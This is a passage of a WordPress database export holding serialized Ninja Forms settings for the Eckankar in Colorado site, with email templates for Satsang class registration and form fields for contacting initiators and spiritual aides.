Class registration.<br>The Arahata for the class you have chosen will be contacting you before the class starts.</p></div></div></div></div>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:253;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-02-01 08:31:40\";s:5:\"label\";s:23:\"User Email Confirmation\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:30:\"New Satsang Class Registration\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:2:\"to\";s:115:\"{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:3520:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2023-2024<br></span></p><p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p><p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p><table style=\"border-collapse: collapse; width: 60%; border: 2px solid #d4d2d2;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>\";}s:2:\"id\";i:250;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-02-01 08:31:40\";s:5:\"label\";s:24:\"Admin Email Notification\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:260:\"New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:115:\"{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:13:\"email_message\";s:3405:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2023-2024<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 45%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}</p>  <p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen:&nbsp;</strong>{field:select_one_class_per_registrant_1658696832524}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>\";}s:2:\"id\";i:252;}i:3;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-02-01 08:31:40\";s:5:\"label\";s:16:\"Store Submission\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:251;}}s:8:\"settings\";a:37:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:36:\"Satsang Class Registration-2023-2024\";s:10:\"created_at\";s:19:\"2023-02-01 08:31:40\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:11:\"<p><br></p>\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:56:\"eck_member_classes_available_for_2023-2024_1693928528054\";i:8;s:45:\"select_one_class_per_registrant_1658696832524\";i:9;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:1:\" \";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:12:\"unique_field\";s:1:\"0\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:24:\"form_title_heading_level\";s:1:\"3\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(62,'a:7:{s:2:\"id\";i:62;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:13:\"default_value\";s:1249:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:5:\"label\";s:4:\"Text\";s:4:\"type\";s:4:\"html\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1168:\"<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_141\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_141\";}s:2:\"id\";i:659;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_142\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_142\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:660;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_143\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_143\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:661;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_144\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_144\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:662;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_145\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_145\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:663;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 